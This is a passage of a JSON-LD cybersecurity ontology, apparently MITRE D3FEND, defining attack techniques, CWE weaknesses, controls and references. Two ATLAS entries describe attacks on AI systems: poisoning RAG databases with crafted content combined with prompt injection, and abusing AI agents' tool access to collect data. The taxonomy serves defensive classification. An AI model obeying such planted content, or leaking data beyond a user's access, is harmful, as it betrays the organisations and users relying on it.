      "rdfs:label": "Account Use Policies"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForProvidingCertifiableElectromagneticPulseAndRFIProtection_InstantAccessNetworksLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20070105445A1"
      },
      "d3f:kb-abstract": "Disclosed are a system and method for providing certifiable shielded cabinets and rooms, or pods, to protect devices, equipment and people from electromagnetic interference such as electromagnetic pulse, and directed energy attack. The method simulates the separate electric and magnetic shield requirements and capabilities of each type of materials, simulating them separately and together to form a combined set of materials layered for an enhanced electromagnetic shield that is lighter weight and less expensive. Further disclosed is a system and method for SCADA, RFID, and OID monitoring and controls to enable initial and ongoing testing and control.",
      "d3f:kb-author": "Charles Manto, Joseph Child",
      "d3f:kb-mitre-analysis": "This patent discloses a system for protecting devices, equipment, and people from EMI, EMP (including high-altitude EMP), RFI, directed energy weapons, and natural events such as extreme solar flares, using layered combinations of lightweight metals and ferrous materials simulated separately and together to optimize shielding effectiveness.",
      "d3f:kb-organization": "Instant Access Networks LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:ElectromagneticRadiationHardening"
      },
      "d3f:kb-reference-title": "System and method for providing certifiable electromagnetic pulse and rfi protection through mass-produced shielded containers and rooms",
      "rdfs:label": "Reference - System and method for providing certifiable electromagnetic pulse and rfi protection through mass-produced shielded containers and rooms - Instant Access Networks LLC"
    },
    {
      "@id": "d3f:OSAPISystemFunction",
      "@type": "owl:Class",
      "d3f:definition": "Indirect System calls are made through an OS-specific library (like glibc in Linux) that provides a higher-level API for the system calls.",
      "d3f:synonym": "Indirect System Call",
      "rdfs:label": "OS API System Function",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIFunction"
      }
    },
    {
      "@id": "d3f:RestoreObject",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreObject"
      ],
      "d3f:d3fend-id": "D3-RO",
      "d3f:definition": "Restoring an object for an entity to access. This is the broadest class for object restoral.",
      "d3f:enables": {
        "@id": "d3f:Restore"
      },
      "rdfs:label": "Restore Object",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N055d75856f05419690c6144a1ce80ea9"
        }
      ]
    },
    {
      "@id": "_:N055d75856f05419690c6144a1ce80ea9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Restore"
      }
    },
    {
      "@id": "d3f:OSAPILoadModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that loads a module into memory and makes it available for execution.",
      "d3f:invokes": {
        "@id": "d3f:LoadModule"
      },
      "rdfs:label": "OS API Load Module",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N219478db07cc4380a106686e5f463dc7"
        }
      ]
    },
    {
      "@id": "_:N219478db07cc4380a106686e5f463dc7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LoadModule"
      }
    },
    {
      "@id": "d3f:T1173",
      "@type": "owl:Class",
      "d3f:attack-id": "T1173",
      "d3f:definition": "Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1559.002",
      "rdfs:label": "Dynamic Data Exchange",
      "rdfs:seeAlso": {
        "@id": "d3f:T1559.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:ApplicationInstallationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the installation of an application onto a system, making it available for use and interaction.",
      "rdfs:label": "Application Installation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N34a61466fa984636a0e98166a064a4e0"
        }
      ]
    },
    {
      "@id": "_:N34a61466fa984636a0e98166a064a4e0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareDeploymentTool"
      }
    },
    {
      "@id": "d3f:AML.T0066",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0066",
      "d3f:definition": "Adversaries may write content designed to be retrieved by user queries and influence a user of the system in some way. This abuses the trust the user has in the system.\n\nThe crafted content can be combined with a prompt injection. It can also stand alone in a separate document or email. The adversary must get the crafted content into the victim\\u0027s database, such as a vector database used in a retrieval augmented generation (RAG) system. This may be accomplished via cyber access, or by abusing the ingestion mechanisms common in RAG systems (see [RAG Poisoning](/techniques/AML.T0070)).\n\nLarge language models may be used as an assistant to aid an adversary in crafting content.",
      "rdfs:label": "Retrieval Content Crafting - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0066"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Retrieval Content Crafting"
    },
    {
      "@id": "d3f:MemoryReadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process retrieves data from a specific memory address, either from its own allocated space or that of another process.",
      "rdfs:label": "Memory Read Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:Nf5902368d55041c0bc30e1a0b28c58ec"
        },
        {
          "@id": "_:N365bef1df0cc408ea06bea8c7e28bb4f"
        }
      ]
    },
    {
      "@id": "_:Nf5902368d55041c0bc30e1a0b28c58ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RawMemoryAccessFunction"
      }
    },
    {
      "@id": "_:N365bef1df0cc408ea06bea8c7e28bb4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:T1584.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.005",
      "d3f:definition": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).",
      "rdfs:label": "Botnet",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:C4.5",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-C4.",
      "d3f:definition": "C4.5 is an algorithm that is strongly based off ID3. It creates decision trees the same way as ID3. C4.5 improves on several aspects of ID3, including handling discreet variables, handling training data with missing values, and has the ability to automatically prune the decision trees it creates.",
      "d3f:kb-article": "## References\nC4.5 algorithm. Wikipedia. [Link](https://en.wikipedia.org/wiki/C4.5_algorithm).",
      "rdfs:label": "C4.5",
      "rdfs:subClassOf": {
        "@id": "d3f:DecisionTree"
      }
    },
    {
      "@id": "d3f:adds",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x adds y: The subject x adds a data object y, such as a file, to some other digital artifact, such as a directory. Examples include an agent or technique adding a record to a database or a domain entry to a DNS server.",
      "rdfs:label": "adds",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-add"
        }
      ]
    },
    {
      "@id": "d3f:T1586.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1586.003",
      "d3f:definition": "Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)",
      "rdfs:label": "Cloud Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1586"
      }
    },
    {
      "@id": "d3f:NetworkLink",
      "@type": "owl:Class",
      "d3f:definition": "A network link is a link within the network layer, which is responsible for packet forwarding including routing through intermediate routers.",
      "d3f:synonym": [
        "Layer-3 Link",
        "Network Layer Link"
      ],
      "rdfs:label": "Network Link",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/resource/Network_layer"
        },
        {
          "@id": "https://www.techtarget.com/searchnetworking/definition/Network-layer"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "d3f:LinuxRenameat",
      "@type": "owl:Class",
      "d3f:definition": "Change the name or location of a file. Different parameter handling than Linux Rename.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/renameat.2.html"
      },
      "rdfs:label": "Linux Renameat",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIMoveFile"
      }
    },
    {
      "@id": "d3f:CWE-1106",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1106",
      "d3f:definition": "The source code uses literal constants that may need to change or evolve over time, instead of using symbolic constants.",
      "rdfs:label": "Insufficient Use of Symbolic Constants",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_27",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Redundant/independent Filtering Mechanisms",
      "d3f:exactly": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-4(27)"
    },
    {
      "@id": "d3f:OTControlProgram",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The file stored in controller memory that is used to operate the controller.",
      "d3f:instructs": {
        "@id": "d3f:OTControlLogicProcess"
      },
      "d3f:synonym": "OT Project File",
      "rdfs:label": "OT Control Program",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N6ee72b2d6f974c0c9d6ecb0b6fe63963"
        }
      ]
    },
    {
      "@id": "_:N6ee72b2d6f974c0c9d6ecb0b6fe63963",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlLogicProcess"
      }
    },
    {
      "@id": "d3f:T1557.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1557.001",
      "d3f:definition": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.",
      "d3f:produces": {
        "@id": "d3f:IntranetMulticastNetworkTraffic"
      },
      "rdfs:label": "LLMNR/NBT-NS Poisoning and SMB Relay",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1557"
        },
        {
          "@id": "_:N0c041d00493149fc8f5aae6b2d02cf9a"
        }
      ]
    },
    {
      "@id": "_:N0c041d00493149fc8f5aae6b2d02cf9a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetMulticastNetworkTraffic"
      }
    },
    {
      "@id": "d3f:deletes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x deletes y: A technique or agent x wipes out the digitally or magnetically recorded information of digital object y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01001860-v"
      },
      "rdfs:label": "deletes",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:evicts"
        },
        {
          "@id": "d3f:modifies"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1058",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1058",
      "d3f:definition": "The code contains a function or method that operates in a multi-threaded environment but owns an unsafe non-final static storable or member data element.",
      "rdfs:label": "Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:CCI-001683_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system notifies organization-defined personnel or roles for account creation actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001683"
    },
    {
      "@id": "d3f:CWE-1004",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1004",
      "d3f:definition": "The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.",
      "rdfs:label": "Sensitive Cookie Without 'HttpOnly' Flag",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:OTReadValueCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Reads the contents of the specified number of consecutive parameter areawords starting from the specified word.",
      "rdfs:label": "OT Read Value Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTReadCommandEvent"
        },
        {
          "@id": "_:Nb3f6531e695941308f17bd69c756d09f"
        },
        {
          "@id": "_:N9e248090c2f24c9280634a0f5fda33a4"
        }
      ]
    },
    {
      "@id": "_:Nb3f6531e695941308f17bd69c756d09f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "_:N9e248090c2f24c9280634a0f5fda33a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadValueCommand"
      }
    },
    {
      "@id": "d3f:DeveloperApplication",
      "@type": "owl:Class",
      "d3f:definition": "An application used to develop computer software including applications used for software construction, analysis, testing, packaging, or management.",
      "rdfs:label": "Developer Application",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Application_development"
        },
        {
          "@id": "dbr:Application_software"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:UserApplication"
      }
    },
    {
      "@id": "d3f:SystemServiceSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:OperatingSystemFile"
      },
      "d3f:definition": "Software services provided as part of the operating system, typically accessed through system calls.",
      "rdfs:label": "System Service Software",
      "rdfs:seeAlso": {
        "@id": "https://www.os-book.com/OS9/slide-dir/PPT-dir/ch2.ppt"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software"
        },
        {
          "@id": "_:N4df78cdf01e24b70b5772b0b34049350"
        }
      ]
    },
    {
      "@id": "_:N4df78cdf01e24b70b5772b0b34049350",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "d3f:Reference-PointerAuthenticationProjectZero",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html"
      },
      "d3f:kb-abstract": "In this post I examine Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS, with a focus on how Apple has improved over the ARM standard. I then demonstrate a way to use an arbitrary kernel read/write primitive to forge kernel PAC signatures for the A keys, which is sufficient to execute arbitrary code in the kernel using JOP. The technique I discovered was (mostly) fixed in iOS 12.1.3. In fact, this fix first appeared in the 16D5032a beta while my research was still ongoing.",
      "d3f:kb-author": "Brandon Azad",
      "d3f:kb-organization": "Project Zero, Google, Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:PointerAuthentication"
      },
      "d3f:kb-reference-title": "Examining Pointer Authentication on the iPhone XS",
      "rdfs:label": "Reference - Pointer Authentication Project Zero"
    },
    {
      "@id": "d3f:T1192",
      "@type": "owl:Class",
      "d3f:attack-id": "T1192",
      "d3f:definition": "Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1566.002",
      "rdfs:label": "Spearphishing Link",
      "rdfs:seeAlso": {
        "@id": "d3f:T1566.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0085",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0085",
      "d3f:definition": "Adversaries may use their access to a victim organization's AI-enabled services to collect proprietary or otherwise sensitive information. As organizations adopt generative AI in centralized services for accessing an organization's data, such as with chat agents which can access retrieval augmented generation (RAG) databases and other data sources via tools, they become increasingly valuable targets for adversaries.\n\nAI agents may be configured to have access to tools and data sources that are not directly accessible by users. Adversaries may abuse this to collect data that a regular user wouldn't be able to access directly.",
      "rdfs:label": "Data from AI Services - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0085"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCollectionTechnique"
      },
      "skos:prefLabel": "Data from AI Services"
    },
    {
      "@id": "d3f:Volume",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In the context of computer operating systems, a volume or logical drive is a single accessible storage area with a single file system, typically (though not necessarily) resident on a single partition of a hard disk. Although a volume might be different from a physical disk drive, it can still be accessed with an operating system's logical interface. However, a volume differs from a partition.",
      "rdfs:label": "Volume",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": [
        "Drive Volume",
        "Logical Drive"
      ]
    },
    {
      "@id": "d3f:originates-from",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x originates-from y: The digital event or artifact x began its network transit from a physical location y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02749218-v"
      },
      "rdfs:label": "originates-from",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-246",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-246",
      "d3f:definition": "The J2EE application directly uses sockets instead of using framework method calls.",
      "rdfs:label": "J2EE Bad Practices: Direct Use of Sockets",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:T0866",
      "@type": "owl:Class",
      "d3f:attack-id": "T0866",
      "d3f:definition": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)",
      "rdfs:label": "Exploitation of Remote Services - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSInitialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        }
      ],
      "skos:prefLabel": "Exploitation of Remote Services"
    },
    {
      "@id": "d3f:LogonEvent",
      "@type": "owl:Class",
      "d3f:definition": "An authentication event where a new session is initiated, signifying the successful validation of credentials and establishment of an authorized connection to a system, application, or resource. This marks the beginning of the subject’s authenticated interaction with the system.",
      "rdfs:label": "Logon Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationEvent"
        },
        {
          "@id": "_:N38142c624eb44769896d45ece73f6e43"
        }
      ]
    },
    {
      "@id": "_:N38142c624eb44769896d45ece73f6e43",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Session"
      }
    },
    {
      "@id": "d3f:CWE-180",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-180",
      "d3f:definition": "The product validates input before it is canonicalized, which prevents the product from detecting data that becomes invalid after the canonicalization step.",
      "rdfs:label": "Incorrect Behavior Order: Validate Before Canonicalize",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-179"
      }
    },
    {
      "@id": "d3f:T0861",
      "@type": "owl:Class",
      "d3f:attack-id": "T0861",
      "d3f:definition": "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience.",
      "rdfs:label": "Point & Tag Identification - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Point & Tag Identification"
    },
    {
      "@id": "d3f:weakness-of",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "weakness-of",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-weakness-of"
      }
    },
    {
      "@id": "d3f:T1059.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.012",
      "d3f:definition": "Adversaries may abuse hypervisor command line interpreters (CLIs) to execute malicious commands. Hypervisor CLIs typically enable a wide variety of functionality for managing both the hypervisor itself and the guest virtual machines it hosts.",
      "rdfs:label": "Hypervisor CLI",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:OTReadFileCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reads data in specified chuncks or the contents of a specified file stored in the file device connected to the PC.",
      "d3f:has-participant": {
        "@id": "d3f:File"
      },
      "rdfs:comment": [
        "BACnet: atomicReadFile",
        "Modbus: Read File Record"
      ],
      "rdfs:label": "OT Read File Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTReadCommand"
        },
        {
          "@id": "_:Nf8f65fa4de7a4ce1a34ddaa93bd52f5f"
        }
      ]
    },
    {
      "@id": "_:Nf8f65fa4de7a4ce1a34ddaa93bd52f5f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-509",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-509",
      "d3f:definition": "Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or the product.",
      "rdfs:label": "Replicating Malicious Code (Virus or Worm)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-507"
      }
    },
    {
      "@id": "d3f:Reference-NIST-RMF-Quick-Start-Guide-Assess-Step-FAQ",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/CSRC/media/Projects/risk-management/documents/05-Assess%20Step/NIST%20RMF%20Assess%20Step-FAQs.pdf"
      },
      "d3f:kb-abstract": "Once security and privacy controls are implemented, they need to be evaluated for correctness and effectiveness. After the initial assessment is completed and the system enters the operations/maintenance phase of the system development life cycle, the controls are assessed on an ongoing basis according to the organization and system’s continuous monitoring plans. The ongoing assessment supports the authorizing official’s decision to continue or discontinue the system’s authorization to operate. Control effectiveness assessments are performed by an independent third-party assessor or assessment team if the system categorization is moderate or high.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST RMF Quick Start Guide - Assess Step - Frequently Asked Questions (FAQ)",
      "rdfs:label": "Reference - NIST RMF Quick Start Guide - Assess Step - Frequently Asked Questions (FAQ)"
    },
    {
      "@id": "d3f:CWE-66",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-66",
      "d3f:definition": "The product does not handle or incorrectly handles a file name that identifies a \"virtual\" resource that is not directly specified within the directory that is associated with the file name, causing the product to perform file-based operations on a resource that is not a file.",
      "rdfs:label": "Improper Handling of File Names that Identify Virtual Resources",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:OSAPISetRegisters",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that modifies the values of CPU registers.",
      "d3f:invokes": {
        "@id": "d3f:SetRegisters"
      },
      "rdfs:label": "OS API Set Registers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nff5e2842d34a4999ab6417192510d600"
        }
      ]
    },
    {
      "@id": "_:Nff5e2842d34a4999ab6417192510d600",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SetRegisters"
      }
    },
    {
      "@id": "d3f:CWE-1292",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1292",
      "d3f:definition": "The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset.",
      "rdfs:label": "Incorrect Conversion of Security Identifiers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CWE-157",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-157",
      "d3f:definition": "The product does not properly handle the characters that are used to mark the beginning and ending of a group of entities, such as parentheses, brackets, and braces.",
      "rdfs:label": "Failure to Sanitize Paired Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACECONT",
      "@type": "owl:Class",
      "d3f:definition": "Restart the stopped tracee process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_CONT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIResumeProcess"
      }
    },
    {
      "@id": "d3f:T1644",
      "@type": "owl:Class",
      "d3f:attack-id": "T1644",
      "d3f:definition": "Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth.",
      "rdfs:label": "Out of Band Data - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Out of Band Data"
    },
    {
      "@id": "d3f:BayesianMethod",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BM",
      "d3f:definition": "Bayesian analysis is a statistical procedure which endeavors to estimate parameters of an underlying distribution based on the observed distribution.",
      "d3f:kb-article": "## References\nWolfram MathWorld. (n.d.). Bayesian Analysis. [Link](https://mathworld.wolfram.com/BayesianAnalysis.html)",
      "rdfs:label": "Bayesian Method",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:T1178",
      "@type": "owl:Class",
      "d3f:attack-id": "T1178",
      "d3f:definition": "The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1134.005",
      "rdfs:label": "SID-History Injection",
      "rdfs:seeAlso": {
        "@id": "d3f:T1134.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:SSHConnectionFailEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating a failure to establish an SSH connection, often due to issues such as authentication errors, network timeouts, or server unavailability.",
      "rdfs:label": "SSH Connection Fail Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionFailEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        }
      ]
    },
    {
      "@id": "d3f:WindowsNtCreateFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
